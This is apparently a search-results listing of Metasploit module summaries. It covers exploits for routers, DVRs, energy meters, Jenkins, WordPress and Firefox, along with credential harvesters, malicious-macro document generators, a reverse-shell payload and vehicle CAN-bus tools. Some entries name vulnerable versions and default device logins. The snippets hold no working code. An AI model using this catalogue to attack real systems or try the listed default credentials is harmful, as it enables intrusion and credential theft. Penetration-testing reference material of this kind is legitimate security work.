6845 matches found
SMS Client
This module sends a text message to multiple phones of the same carrier. You can use it to send a malicious link to phones. Please note that you do not use this module to send a media file attachment. In order to send a media file, please use auxiliary/client/mms/sendmms instead. This module...
Cambium ePMP 1000 'ping' Password Hash Extractor (up to v2.5)
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 Authors Karn Ganeshen This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Cambium ePMP 1000 'ping' Password Hash...
Logsign Remote Command Injection
This module exploits a command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the root user. Logsign has a publicly accessible endpoint. That endpoint takes a user input and then use it during operating system command...
Debian/Ubuntu ntfs-3g Local Privilege Escalation
ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user. This module requires Metasploit: https://metasploit.com/download...
QNAP NAS/NVR Administrator Hash Disclosure
This module exploits combined heap and stack buffer overflows for QNAP NAS and NVR devices to dump the admin root shadow hash from memory via an overwrite of libcargv0 in the HTTP-header-bound glibc backtrace. A binary search is performed to find the correct offset for the BOFs. Since the server...
Gather Tomcat Credentials
This module will attempt to collect credentials from Tomcat services running on the machine. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Gather Tomcat Credentials', 'Description' = %q This...
Jboss Credential Collector
This module can be used to extract the Jboss admin passwords for version 4,5 and 6. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'nokogiri' class MetasploitModule 'Jboss Credential Collector', 'Description'...
Architecture Migrate
This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process. This module requires Metasploit: https://metasploit.com/download Current source:...
NTDS Grabber
This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows Gather DynaZIP Saved Password Extraction
This module extracts clear text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
MVPower DVR Shell Unauthenticated Command Execution
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string. This module was tested successfully on a MVPower model TV-7104HE with firmware...
Kodi 17.0 Local File Inclusion Vulnerability
This module exploits a directory traversal flaw found in Kodi before 17.1. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Kodi 17.0 Local File Inclusion Vulnerability', 'Description' = %q This...
Microsoft Office Word Malicious Macro Execution
This module injects a malicious macro into a Microsoft Office Word document docx. The comments field in the metadata is injected with a Base64 encoded payload, which will be decoded by the macro and execute as a Windows executable. For a successful attack, the victim is required to manually enabl...
Netgear R7000 and R6400 cgi-bin Command Injection
This module exploits an arbitrary command injection vulnerability in Netgear R7000 and R6400 router firmware version 1.0.7.21.1.93 and possibly earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE
This module exploits a stack Buffer Overflow in the GCore server GCoreServer.exe. The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 Version 1.4.YYYYY. This module requires Metasploit:...
Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SM...
Piwik Superuser Plugin Upload
This module will generate a plugin, pack the payload into it and upload it to a server running Piwik. Superuser Credentials are required to run this module. This module does not work against Piwik 1 as there is no option to upload custom plugins. Piwik disabled custom plugin uploads in version...
Microsoft SQL Server Clr Stored Procedure Payload Execution
This module executes an arbitrary native payload on a Microsoft SQL server by loading a custom SQL CLR Assembly into the target SQL installation, and calling it directly with a base64-encoded payload. The module requires working credentials in order to connect directly to the MSSQL Server. This...
Apache OpenOffice Text Document Malicious Macro Execution
This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to...
Android Meterpreter Shell, Reverse HTTPS Inline
Connect back to attacker and spawn a Meterpreter shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::TransportConfig include Msf::Payload::Single...
WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress REST API...
NETGEAR Administrator Password Disclosure
This module will collect the password for the admin user. The exploit will not complete if password recovery is set on the router. The password is received by passing the token generated from unauth.cgi to passwordrecovered.cgi. This exploit works on many different NETGEAR products. The full list...
Cambium ePMP 1000 Dump Device Config
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four 4 login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration...
Binom3 Web Management Login Scanner, Config and Password File Dump
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portals, and attempts to identify valid credentials. There are four 4 default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can...
AlienVault OSSIM/USM Remote Code Execution
This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together. Unauthenticated users can execute arbitrary commands under the context of the root user. By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection...
Cisco WebEx Chrome Extension RCE (CVE-2017-3823)
This module exploits a vulnerability present in the Cisco WebEx Chrome Extension version 1.0.1 which allows an attacker to execute arbitrary commands on a system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
mDNS Spoofer
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address assuming the request matches our regex. This module requires Metasploit: https://metasploit.com/download Current source:...
Advantech WebAccess 8.1 Post Authentication Credential Collector
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials. Although authentication is required, any level of user permission can exploit this vulnerability. Note that 8.2 is not suitable for this. This module requires Metasploit: https://metasploit.com/downloa...
Advantech WebAccess Login
This module will attempt to authenticate to Advantech WebAccess. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/loginscanner/advantechwebaccess' require...
Firefox nsSMILTimeContainer::NotifyTimeChange() RCE
This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange across numerous versions of Mozilla Firefox on Microsoft Windows. This module requires Metasploit: https://metasploit.com/download Current source:...
DiskSavvy Enterprise GET Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP...
Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution
This module exploits a command injection vulnerability in the Trend Micro IMSVA product. An authenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installation of IMSVA comes with a default administrator credentials. saveCert.ims...
Cisco Firepower Management Console 6.0 Login
This module attempts to authenticate to a Cisco Firepower Management console via HTTPS. The credentials are also used for SSH, which could allow remote code execution. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the Billion 5200W-T router. This customized version has at least two command injection vulnerabilities, one authenticated and one unauthenticated, on different firmware versions. This module will attempt to exploit...
TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection vulnerability in the remote log forwarding page. This can be exploited using the "supervisor" account that comes with a...
TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection
TrueOnline is a major ISP in Thailand, and it distributes a customized version of the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command injection vulnerability in the remote log forwarding page. This module was tested in an emulated environment, as the author doesn'...
Jenkins CLI HTTP Java Deserialization Vulnerability
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not required to exploit this vulnerability. This module requires Metasploit: https://metasploit.com/download Current sourc...
Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
This module exploits a directory traversal vulnerability in Cisco Firepower Management under the context of www user. Authentication is required to exploit this vulnerability. This module requires Metasploit: https://metasploit.com/download Current source:...
DiskBoss Enterprise GET Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on...
Sample Module to Flood Temp Gauge on 2006 Malibu
Simple sample temp flood for the 2006 Malibu This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sample Module to Flood Temp Gauge on 2006 Malibu', 'Description' = %q Simple sample temp flood for t...
Get the Vehicle Information Such as the VIN from the Target Module
Post Module to query DTCs, Some common engine info and Vehicle Info. It returns such things as engine speed, coolant temp, Diagnostic Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc This module requires Metasploit: https://metasploit.com/download Current source:...
Hardware Bridge Server
This module sets up a web server to bridge communications between Metasploit and physically attached hardware. Currently this module supports: automotive This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework TODO: SSL...
Hardware Bridge Session Connector
The Hardware Bridge HWBridge is a standardized method for Metasploit to interact with Hardware Devices. This extends the normal exploit capabilities to the non-ethernet realm and enables direct hardware and alternative bus manipulations. You must have compatible bridging hardware attached to this...
Scan CAN Bus for Diagnostic Modules
Post Module to scan the CAN bus for any modules that can respond to UDS DSC queries This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Scan CAN Bus for Diagnostic Modules', 'Description' = %q Post...
Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability
This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability...
Meteocontrol WEBlog Password Extractor
This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances software version 'Meteocontrol WEBlog Password Extractor', 'Description' = % This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances software version 'URL',...
Cambium ePMP 1000 Login Scanner
This module scans for Cambium ePMP 1000 management login portals, and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. This module requires Metasploit: https://metasploit.com/download Current source:...
VMware VDP Known SSH Key
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'net/ssh...
PHPMailer Sendmail Argument Injection
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to th...
NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Buffer Overflow
The NETGEAR WNR2000 router has a stack buffer overflow vulnerability in the hiddenlangavi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an...